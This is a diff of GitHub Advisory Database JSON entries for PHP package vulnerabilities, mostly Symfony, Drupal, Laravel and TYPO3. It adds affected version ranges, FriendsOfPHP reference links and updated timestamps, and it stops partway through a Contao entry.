1a2251ddf545a..fc46ced7a5eec 100644 --- a/advisories/github-reviewed/2021/10/GHSA-j66h-cc96-c32q/GHSA-j66h-cc96-c32q.json +++ b/advisories/github-reviewed/2021/10/GHSA-j66h-cc96-c32q/GHSA-j66h-cc96-c32q.json @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "1.0" + "introduced": "1.0.0" }, { "fixed": "1.8.1" @@ -40,6 +40,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-36150" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/admin/CVE-2021-36150.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/silverstripe/silverstripe-framework" diff --git a/advisories/github-reviewed/2021/10/GHSA-m2jh-fxw4-gphm/GHSA-m2jh-fxw4-gphm.json b/advisories/github-reviewed/2021/10/GHSA-m2jh-fxw4-gphm/GHSA-m2jh-fxw4-gphm.json index e930a43134588..097ecdcc01330 100644 --- a/advisories/github-reviewed/2021/10/GHSA-m2jh-fxw4-gphm/GHSA-m2jh-fxw4-gphm.json +++ b/advisories/github-reviewed/2021/10/GHSA-m2jh-fxw4-gphm/GHSA-m2jh-fxw4-gphm.json @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.5.0" + } + ] + } + ] } ], "references": [ @@ -52,6 +71,14 @@ "type": "WEB", "url": "https://github.com/TYPO3/typo3/commit/5cbff85506cebe343e5ae59228977547cf8e3cf4" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-41114.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-41114.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/TYPO3/typo3" diff --git a/advisories/github-reviewed/2021/10/GHSA-r7rh-g777-g5gx/GHSA-r7rh-g777-g5gx.json b/advisories/github-reviewed/2021/10/GHSA-r7rh-g777-g5gx/GHSA-r7rh-g777-g5gx.json index 8aa546e707407..e4f9cb4777e90 100644 --- a/advisories/github-reviewed/2021/10/GHSA-r7rh-g777-g5gx/GHSA-r7rh-g777-g5gx.json +++ b/advisories/github-reviewed/2021/10/GHSA-r7rh-g777-g5gx/GHSA-r7rh-g777-g5gx.json @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "3.0.0" }, { "fixed": "3.5.2" @@ -44,6 +44,10 @@ "type": "WEB", "url": "https://github.com/silverstripe/silverstripe-graphql/pull/407/commits/16961459f681f7b32145296189dfdbcc7715e6ed" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/graphql/CVE-2021-28661.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/silverstripe/silverstripe-graphql" diff --git a/advisories/github-reviewed/2021/11/GHSA-2xhg-w2g5-w95x/GHSA-2xhg-w2g5-w95x.json b/advisories/github-reviewed/2021/11/GHSA-2xhg-w2g5-w95x/GHSA-2xhg-w2g5-w95x.json index 14aa65542108a..dd0dfe85078da 100644 --- a/advisories/github-reviewed/2021/11/GHSA-2xhg-w2g5-w95x/GHSA-2xhg-w2g5-w95x.json +++ b/advisories/github-reviewed/2021/11/GHSA-2xhg-w2g5-w95x/GHSA-2xhg-w2g5-w95x.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2xhg-w2g5-w95x", - "modified": "2021-12-06T21:36:47Z", + "modified": "2024-02-05T11:14:05Z", "published": "2021-11-24T21:01:23Z", "aliases": [ "CVE-2021-41270" @@ -52,6 +52,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.1.0" + }, + { + "fixed": "4.4.35" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0" + }, + { + "fixed": "5.3.12" + } + ] + } + ] } ], "references": [ @@ -71,6 +109,14 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/3da6f2d45e7536ccb2a26f52fbaf340917e208a8" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/serializer/CVE-2021-41270.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2021-41270.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/symfony" @@ -79,6 +125,14 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/releases/tag/v5.3.12" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3BPT4SF6SIXFMZARDWED5T32J7JEH3EP/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QSREFD2TJT5LWKM6S4MD3W26NQQ5WJUP/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3BPT4SF6SIXFMZARDWED5T32J7JEH3EP/" @@ -86,6 +140,10 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QSREFD2TJT5LWKM6S4MD3W26NQQ5WJUP/" + }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2021-41270" } ], "database_specific": { diff --git a/advisories/github-reviewed/2021/11/GHSA-86fh-j58m-7pf5/GHSA-86fh-j58m-7pf5.json b/advisories/github-reviewed/2021/11/GHSA-86fh-j58m-7pf5/GHSA-86fh-j58m-7pf5.json index e4728715d69cd..aded9ce244f99 100644 --- a/advisories/github-reviewed/2021/11/GHSA-86fh-j58m-7pf5/GHSA-86fh-j58m-7pf5.json +++ b/advisories/github-reviewed/2021/11/GHSA-86fh-j58m-7pf5/GHSA-86fh-j58m-7pf5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-86fh-j58m-7pf5", - "modified": "2021-11-22T19:04:02Z", + "modified": "2024-01-31T15:13:11Z", "published": "2021-11-23T17:57:14Z", "aliases": [ "CVE-2021-36372" @@ -40,6 +40,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-36372" }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/ozone" + }, { "type": "WEB", "url": "https://mail-archives.apache.org/mod_mbox/ozone-dev/202111.mbox/%3C5029c1ac-4685-8492-e3cb-ab48c5c370cf%40apache.org%3E" diff --git a/advisories/github-reviewed/2021/11/GHSA-q3j3-w37x-hq2q/GHSA-q3j3-w37x-hq2q.json b/advisories/github-reviewed/2021/11/GHSA-q3j3-w37x-hq2q/GHSA-q3j3-w37x-hq2q.json index bc2195c012d26..1612f75764cb9 100644 --- a/advisories/github-reviewed/2021/11/GHSA-q3j3-w37x-hq2q/GHSA-q3j3-w37x-hq2q.json +++ b/advisories/github-reviewed/2021/11/GHSA-q3j3-w37x-hq2q/GHSA-q3j3-w37x-hq2q.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q3j3-w37x-hq2q", - "modified": "2021-11-25T00:18:27Z", + "modified": "2024-02-05T11:13:47Z", "published": "2021-11-24T20:04:25Z", "aliases": [ "CVE-2021-41267" @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.2.0" + }, + { + "fixed": "5.3.12" + } + ] + } + ] } ], "references": [ @@ -52,9 +71,21 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/95dcf51682029e89450aee86267e3d553aa7c487" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/http-kernel/CVE-2021-41267.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2021-41267.yaml" + }, { "type": "WEB", "url": "https://github.com/symfony/symfony/releases/tag/v5.3.12" + }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2021-41267" } ], "database_specific": { diff --git a/advisories/github-reviewed/2021/11/GHSA-qw36-p97w-vcqr/GHSA-qw36-p97w-vcqr.json b/advisories/github-reviewed/2021/11/GHSA-qw36-p97w-vcqr/GHSA-qw36-p97w-vcqr.json index 4fa7f08027d21..80d63f4bc80d4 100644 --- a/advisories/github-reviewed/2021/11/GHSA-qw36-p97w-vcqr/GHSA-qw36-p97w-vcqr.json +++ b/advisories/github-reviewed/2021/11/GHSA-qw36-p97w-vcqr/GHSA-qw36-p97w-vcqr.json @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.3.0" + }, + { + "fixed": "5.3.12" + } + ] + } + ] } ], "references": [ @@ -52,6 +71,14 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/36a808b857cd3240244f4b224452fb1e70dc6dfc" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-bundle/CVE-2021-41268.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2021-41268.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/symfony" @@ -59,6 +86,10 @@ { "type": "WEB", "url": "https://github.com/symfony/symfony/releases/tag/v5.3.12" + }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2021-41268" } ], "database_specific": { diff --git a/advisories/github-reviewed/2021/11/GHSA-r7cj-8hjg-x622/GHSA-r7cj-8hjg-x622.json b/advisories/github-reviewed/2021/11/GHSA-r7cj-8hjg-x622/GHSA-r7cj-8hjg-x622.json index 50b2e51d8d5c5..04155386aed85 100644 --- a/advisories/github-reviewed/2021/11/GHSA-r7cj-8hjg-x622/GHSA-r7cj-8hjg-x622.json +++ b/advisories/github-reviewed/2021/11/GHSA-r7cj-8hjg-x622/GHSA-r7cj-8hjg-x622.json @@ -48,6 +48,10 @@ "type": "WEB", "url": "https://github.com/doctrine/dbal/commit/9dcfa4cb6c03250b78a84737ba7ceb82f4b7ba4d" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/doctrine/dbal/CVE-2021-43608.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/doctrine/dbal/" diff --git a/advisories/github-reviewed/2021/12/GHSA-66hf-2p6w-jqfw/GHSA-66hf-2p6w-jqfw.json b/advisories/github-reviewed/2021/12/GHSA-66hf-2p6w-jqfw/GHSA-66hf-2p6w-jqfw.json index 685e8cf1e05fd..3088d48af757c 100644 --- a/advisories/github-reviewed/2021/12/GHSA-66hf-2p6w-jqfw/GHSA-66hf-2p6w-jqfw.json +++ b/advisories/github-reviewed/2021/12/GHSA-66hf-2p6w-jqfw/GHSA-66hf-2p6w-jqfw.json @@ -71,6 +71,63 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "illuminate/view" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.20.42" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "illuminate/view" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.0.0" + }, + { + "fixed": "7.30.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "illuminate/view" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.75.0" + } + ] + } + ] } ], "references": [ @@ -98,6 +155,14 @@ "type": "WEB", "url": "https://github.com/laravel/framework/commit/b8174169b1807f36de1837751599e2828ceddb9b" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/illuminate/view/CVE-2021-43808.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/laravel/framework/CVE-2021-43808.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/laravel/framework" diff --git a/advisories/github-reviewed/2021/12/GHSA-jfh8-c2jp-5v3q/GHSA-jfh8-c2jp-5v3q.json b/advisories/github-reviewed/2021/12/GHSA-jfh8-c2jp-5v3q/GHSA-jfh8-c2jp-5v3q.json index 62becdd47b0e5..e97e4a448e5da 100644 --- a/advisories/github-reviewed/2021/12/GHSA-jfh8-c2jp-5v3q/GHSA-jfh8-c2jp-5v3q.json +++ b/advisories/github-reviewed/2021/12/GHSA-jfh8-c2jp-5v3q/GHSA-jfh8-c2jp-5v3q.json @@ -44,7 +44,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "2.0-beta9" }, { "fixed": "2.3.1" diff --git a/advisories/github-reviewed/2021/12/GHSA-mh9j-v6mq-pfch/GHSA-mh9j-v6mq-pfch.json b/advisories/github-reviewed/2021/12/GHSA-mh9j-v6mq-pfch/GHSA-mh9j-v6mq-pfch.json index 363ec64528d89..0c61e64f24aaf 100644 --- a/advisories/github-reviewed/2021/12/GHSA-mh9j-v6mq-pfch/GHSA-mh9j-v6mq-pfch.json +++ b/advisories/github-reviewed/2021/12/GHSA-mh9j-v6mq-pfch/GHSA-mh9j-v6mq-pfch.json @@ -32,10 +32,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 3.0.5" - } + ] } ], "references": [ @@ -51,6 +48,14 @@ "type": "WEB", "url": "https://github.com/matyhtf/framework/commit/25084603b7ea771eebe263d39744fe6abf1f8d61" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/matyhtf/framework/CVE-2021-43676.yaml" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-mh9j-v6mq-pfch" + }, { "type": "PACKAGE", "url": "https://github.com/matyhtf/framework" diff --git a/advisories/github-reviewed/2021/12/GHSA-qphc-hf5q-v8fc/GHSA-qphc-hf5q-v8fc.json b/advisories/github-reviewed/2021/12/GHSA-qphc-hf5q-v8fc/GHSA-qphc-hf5q-v8fc.json index 7fd64b38b411d..5cdef416beb41 100644 --- a/advisories/github-reviewed/2021/12/GHSA-qphc-hf5q-v8fc/GHSA-qphc-hf5q-v8fc.json +++ b/advisories/github-reviewed/2021/12/GHSA-qphc-hf5q-v8fc/GHSA-qphc-hf5q-v8fc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qphc-hf5q-v8fc", - "modified": "2023-08-08T16:59:42Z", + "modified": "2024-02-08T12:30:47Z", "published": "2021-12-14T21:19:08Z", "aliases": [ "CVE-2021-44528" @@ -93,6 +93,10 @@ "type": "WEB", "url": "https://groups.google.com/g/ruby-security-ann/c/vG9gz3nk1pM/m/7-NU4MNrDAAJ?utm_medium=email&utm_source=footer" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240208-0003/" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5372" diff --git a/advisories/github-reviewed/2022/01/GHSA-29gp-2c3m-3j6m/GHSA-29gp-2c3m-3j6m.json b/advisories/github-reviewed/2022/01/GHSA-29gp-2c3m-3j6m/GHSA-29gp-2c3m-3j6m.json index 4d8a301160d80..32bf4acc37bc0 100644 --- a/advisories/github-reviewed/2022/01/GHSA-29gp-2c3m-3j6m/GHSA-29gp-2c3m-3j6m.json +++ b/advisories/github-reviewed/2022/01/GHSA-29gp-2c3m-3j6m/GHSA-29gp-2c3m-3j6m.json @@ -67,6 +67,10 @@ "type": "WEB", "url": "https://github.com/smarty-php/smarty/commit/215d81a9fa3cd63d82fb3ab56ecaf97cf1e7db71" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/smarty/smarty/CVE-2021-29454.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/smarty-php/smarty" diff --git a/advisories/github-reviewed/2022/01/GHSA-4h9c-v5vg-5m6m/GHSA-4h9c-v5vg-5m6m.json b/advisories/github-reviewed/2022/01/GHSA-4h9c-v5vg-5m6m/GHSA-4h9c-v5vg-5m6m.json index 067a884175f9b..f4b5bfa64c203 100644 --- a/advisories/github-reviewed/2022/01/GHSA-4h9c-v5vg-5m6m/GHSA-4h9c-v5vg-5m6m.json +++ b/advisories/github-reviewed/2022/01/GHSA-4h9c-v5vg-5m6m/GHSA-4h9c-v5vg-5m6m.json @@ -67,6 +67,10 @@ "type": "WEB", "url": "https://github.com/smarty-php/smarty/commit/19ae410bf56007a5ef24441cdc6414619cfaf664" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/smarty/smarty/CVE-2021-21408.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/smarty-php/smarty" diff --git a/advisories/github-reviewed/2022/01/GHSA-4rmr-c2jx-vx27/GHSA-4rmr-c2jx-vx27.json b/advisories/github-reviewed/2022/01/GHSA-4rmr-c2jx-vx27/GHSA-4rmr-c2jx-vx27.json index 44da6883f9831..1c3b4e28fe52c 100644 --- a/advisories/github-reviewed/2022/01/GHSA-4rmr-c2jx-vx27/GHSA-4rmr-c2jx-vx27.json +++ b/advisories/github-reviewed/2022/01/GHSA-4rmr-c2jx-vx27/GHSA-4rmr-c2jx-vx27.json @@ -44,10 +44,18 @@ "type": "WEB", "url": "https://github.com/bobthecow/mustache.php/commit/579ffa5c96e1d292c060b3dd62811ff01ad8c24e" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/mustache/mustache/CVE-2022-0323.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/bobthecow/mustache.php" }, + { + "type": "WEB", + "url": "https://github.com/bobthecow/mustache.php/releases/tag/v2.14.1" + }, { "type": "WEB", "url": "https://huntr.dev/bounties/a5f5a988-aa52-4443-839d-299a63f44fb7" diff --git a/advisories/github-reviewed/2022/01/GHSA-8cw5-rv98-5c46/GHSA-8cw5-rv98-5c46.json b/advisories/github-reviewed/2022/01/GHSA-8cw5-rv98-5c46/GHSA-8cw5-rv98-5c46.json index f6af0fa78ea56..771e6d3f4ef8e 100644 --- a/advisories/github-reviewed/2022/01/GHSA-8cw5-rv98-5c46/GHSA-8cw5-rv98-5c46.json +++ b/advisories/github-reviewed/2022/01/GHSA-8cw5-rv98-5c46/GHSA-8cw5-rv98-5c46.json @@ -71,6 +71,63 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.0.0" + }, + { + "fixed": "7.62.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.5.9" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.6.0" + }, + { + "fixed": "8.6.6" + } + ] + } + ] } ], "references": [ @@ -78,6 +135,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-6339" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/core/CVE-2019-6339.yaml" + }, { "type": "WEB", "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/drupal/CVE-2019-6339.yaml" diff --git a/advisories/github-reviewed/2022/02/GHSA-5mv2-rx3q-4w2v/GHSA-5mv2-rx3q-4w2v.json b/advisories/github-reviewed/2022/02/GHSA-5mv2-rx3q-4w2v/GHSA-5mv2-rx3q-4w2v.json index bccd5a0af2699..2f079a1dbdd5b 100644 --- a/advisories/github-reviewed/2022/02/GHSA-5mv2-rx3q-4w2v/GHSA-5mv2-rx3q-4w2v.json +++ b/advisories/github-reviewed/2022/02/GHSA-5mv2-rx3q-4w2v/GHSA-5mv2-rx3q-4w2v.json @@ -71,6 +71,10 @@ "type": "WEB", "url": "https://github.com/twigphp/Twig/commit/2eb33080558611201b55079d07ac88f207b466d5" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/twig/twig/CVE-2022-23614.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/twigphp/Twig/" @@ -91,6 +95,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SIGZCFSYLPP7UVJ4E4NLHSOQSKYNXSAD/" }, + { + "type": "WEB", + "url": "https://symfony.com/blog/twig-security-release-disallow-non-closures-in-the-sort-filter" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5107" diff --git a/advisories/github-reviewed/2022/02/GHSA-fqx8-v33p-4qcc/GHSA-fqx8-v33p-4qcc.json b/advisories/github-reviewed/2022/02/GHSA-fqx8-v33p-4qcc/GHSA-fqx8-v33p-4qcc.json index 1585b8f297ac4..b89da8275b2d5 100644 --- a/advisories/github-reviewed/2022/02/GHSA-fqx8-v33p-4qcc/GHSA-fqx8-v33p-4qcc.json +++ b/advisories/github-reviewed/2022/02/GHSA-fqx8-v33p-4qcc/GHSA-fqx8-v33p-4qcc.json @@ -52,6 +52,14 @@ "type": "WEB", "url": "https://github.com/darylldoyle/svg-sanitizer/commit/17e12ba9c2881caa6b167d0fbea555c11207fbb0" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/enshrined/svg-sanitize/CVE-2022-23638.yaml" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-fqx8-v33p-4qcc" + }, { "type": "PACKAGE", "url": "https://github.com/darylldoyle/svg-sanitizer" diff --git a/advisories/github-reviewed/2022/02/GHSA-g44j-7vp3-68cv/GHSA-g44j-7vp3-68cv.json b/advisories/github-reviewed/2022/02/GHSA-g44j-7vp3-68cv/GHSA-g44j-7vp3-68cv.json index 3364970f1ec52..067fd87b92a63 100644 --- a/advisories/github-reviewed/2022/02/GHSA-g44j-7vp3-68cv/GHSA-g44j-7vp3-68cv.json +++ b/advisories/github-reviewed/2022/02/GHSA-g44j-7vp3-68cv/GHSA-g44j-7vp3-68cv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g44j-7vp3-68cv", - "modified": "2021-05-19T22:08:41Z", + "modified": "2024-02-02T15:59:34Z", "published": "2022-02-15T01:57:18Z", "aliases": [ "CVE-2015-3629" @@ -80,6 +80,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2021-05-19T22:08:41Z", - "nvd_published_at": null + "nvd_published_at": "2015-05-18T15:59:15Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2022/02/GHSA-grc3-8q8m-4j7c/GHSA-grc3-8q8m-4j7c.json b/advisories/github-reviewed/2022/02/GHSA-grc3-8q8m-4j7c/GHSA-grc3-8q8m-4j7c.json index 947e381910da0..2d6a057a93001 100644 --- a/advisories/github-reviewed/2022/02/GHSA-grc3-8q8m-4j7c/GHSA-grc3-8q8m-4j7c.json +++ b/advisories/github-reviewed/2022/02/GHSA-grc3-8q8m-4j7c/GHSA-grc3-8q8m-4j7c.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-grc3-8q8m-4j7c", - "modified": "2021-04-07T22:41:39Z", + "modified": "2024-01-31T15:12:56Z", "published": "2022-02-09T22:37:59Z", "aliases": [ "CVE-2020-17533" @@ -70,6 +70,10 @@ "type": "WEB", "url": "https://github.com/apache/accumulo/commit/877ad502f6857e48342664e4b0ce83db74e4cda4" }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/accumulo" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf8c1a787b6951d3dacb9ec58f0bf1633790c91f54ff10c6f8ff9d8ed%40%3Cannounce.apache.org%3E" diff --git a/advisories/github-reviewed/2022/02/GHSA-jmhf-9fj8-88gh/GHSA-jmhf-9fj8-88gh.json b/advisories/github-reviewed/2022/02/GHSA-jmhf-9fj8-88gh/GHSA-jmhf-9fj8-88gh.json index ecc4e564dc8ea..a2a3bcd315a42 100644 --- a/advisories/github-reviewed/2022/02/GHSA-jmhf-9fj8-88gh/GHSA-jmhf-9fj8-88gh.json +++ b/advisories/github-reviewed/2022/02/GHSA-jmhf-9fj8-88gh/GHSA-jmhf-9fj8-88gh.json @@ -48,6 +48,10 @@ "type": "WEB", "url": "https://github.com/rudloff/alltube/commit/bc14b6e45c766c05757fb607ef8d444cbbfba71a" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/rudloff/alltube/CVE-2022-0692.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/Rudloff/alltube" diff --git a/advisories/github-reviewed/2022/02/GHSA-m6q5-wv4x-fv6h/GHSA-m6q5-wv4x-fv6h.json b/advisories/github-reviewed/2022/02/GHSA-m6q5-wv4x-fv6h/GHSA-m6q5-wv4x-fv6h.json index 72984dd1f43a5..ba5efdd3ef131 100644 --- a/advisories/github-reviewed/2022/02/GHSA-m6q5-wv4x-fv6h/GHSA-m6q5-wv4x-fv6h.json +++ b/advisories/github-reviewed/2022/02/GHSA-m6q5-wv4x-fv6h/GHSA-m6q5-wv4x-fv6h.json @@ -71,6 +71,63 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.8.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.9.0" + }, + { + "fixed": "8.9.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.0.6" + } + ] + } + ] } ], "references": [ @@ -90,6 +147,14 @@ "type": "WEB", "url": "https://github.com/drupal/core/commit/d4be028d81fb6b067513d788b60c3e6fc8fbd0a2" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/core/CVE-2020-13668.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/drupal/CVE-2020-13668.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/drupal/core" diff --git a/advisories/github-reviewed/2022/02/GHSA-mmjr-5q74-p3m4/GHSA-mmjr-5q74-p3m4.json b/advisories/github-reviewed/2022/02/GHSA-mmjr-5q74-p3m4/GHSA-mmjr-5q74-p3m4.json index 446e41b13c33f..0743888dffd56 100644 --- a/advisories/github-reviewed/2022/02/GHSA-mmjr-5q74-p3m4/GHSA-mmjr-5q74-p3m4.json +++ b/advisories/github-reviewed/2022/02/GHSA-mmjr-5q74-p3m4/GHSA-mmjr-5q74-p3m4.json @@ -71,6 +71,63 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.8.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.9.0" + }, + { + "fixed": "8.9.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.0.6" + } + ] + } + ] } ], "references": [ @@ -82,6 +139,14 @@ "type": "WEB", "url": "https://github.com/drupal/core/commit/f93a37b713b59f8d24e826bc74378099853eef3d" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/core/CVE-2020-13670.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/drupal/CVE-2020-13670.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/drupal/core" diff --git a/advisories/github-reviewed/2022/02/GHSA-pj4j-287j-f742/GHSA-pj4j-287j-f742.json b/advisories/github-reviewed/2022/02/GHSA-pj4j-287j-f742/GHSA-pj4j-287j-f742.json index f7949f160e534..83a04e84114b8 100644 --- a/advisories/github-reviewed/2022/02/GHSA-pj4j-287j-f742/GHSA-pj4j-287j-f742.json +++ b/advisories/github-reviewed/2022/02/GHSA-pj4j-287j-f742/GHSA-pj4j-287j-f742.json @@ -15,6 +15,63 @@ } ], "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.4.18" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.5.0" + }, + { + "fixed": "4.5.8" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/core-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + 